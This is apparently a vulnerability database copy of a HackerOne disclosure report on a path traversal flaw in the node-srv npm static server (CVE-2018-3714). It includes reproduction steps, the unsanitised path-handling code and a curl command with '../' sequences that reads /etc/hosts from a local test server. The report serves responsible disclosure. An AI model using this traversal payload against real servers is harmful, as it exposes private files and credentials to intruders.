Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneBl4deH1:309124
HistoryJan 25, 2018 - 8:00 p.m.

Node.js third-party modules: [node-srv] Path Traversal allows to read arbitrary files from remote server

2018-01-2520:00:51
bl4de
hackerone.com
161

EPSS

0.002

Percentile

55.6%

JSON

Hi Guys,

node-srv contains Path Traversal vulnerability, which allows malicious user to read content of any file with known path.

Module:

Simple static node.js server. Supports Heroku and Grunt.js
https://www.npmjs.com/package/node-srv

Description

node-srv does not sanitize path in the correct way, so curl can be used to retrieve content of any file from the remote server.

Steps To Reproduce:

  • install node-srv
$ npm install node-srv
  • create simple server:
//Require module 
var Server = require('node-srv');

// Start server 
var srv = new Server({
    port: 8080,
    root: './',
    logs: true
}, function () {
    console.log('Server stopped');
});
  • run server:
$ node app.js

  • visit http://127.0.0.1:8080 to verify if everything is fine.

  • now, run following curl command (please adjust numbers of …/ to your system):

$ curl -v --path-as-is http://127.0.0.1:8080/node_modules/../../../../../etc/hosts

You should see the content of /etc/hosts file:

{F257357}

The problem is that url read from the user is not sanitize in any way against classic ../ path traversal payload:

return new Promise((function(_this) {
        return function(resolve, reject) {
          var uri;
          uri = url.parse(req.url);
          return resolve(uri.pathname);
        };
      })(this)).then((function(_this) {
        return function(pathname) {
          filePath = pathname;
          filePath = filePath.replace(/\/$/, "/" + _this.options.index);
          filePath = filePath.replace(/^\//, "");
          filePath = path.resolve(process.cwd(), _this.options.root || './', filePath);
          return _this.processRequest(res, filePath);
        };

Supporting Material/References:

Configuration I’ve used to find this vulnerability:

  • macOS HighSierra 10.13.3
  • node 8.9.3
  • npm 5.5.1
  • curl 7.54.0

Wrap up

I hope this report will help to keep Node ecosystem more safe. If you have any questions about any details of this finding, please let me know in comment.

Thank you

Regards,

Rafal ‘bl4de’ Janicki

Impact

This vulnerability allows malicious user to read content of any file on the server, which leads to data breach or other attacks.

Related

nodejs 1
veracode 1
cvelist 1
cve 1
osv 1
nvd 1
prion 1
nuclei 1
github 1
openvas 1
nodejs
nodejs
Path Traversal
2018-04-24 15:43:00
veracode
veracode
Directory Traversal
2018-03-08 07:52:11
cvelist
cvelist
CVE-2018-3714
2018-06-07 02:00:00
cve
cve
CVE-2018-3714
2018-06-07 02:29:07
osv
osv
Path Traversal in node-srv
2018-07-26 14:50:41
nvd
nvd
CVE-2018-3714
2018-06-07 02:29:07
prion
prion
Path traversal
2018-06-07 02:29:00
nuclei
nuclei
node-srv - Local File Inclusion
2020-07-05 15:49:09
github
github
Path Traversal in node-srv
2018-07-26 14:50:41
openvas
openvas
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00

EPSS

0.002

Percentile

55.6%

JSON
Related for H1:309124
nodejs1veracode1cvelist1cve1osv1nvd1prion1nuclei1github1openvas1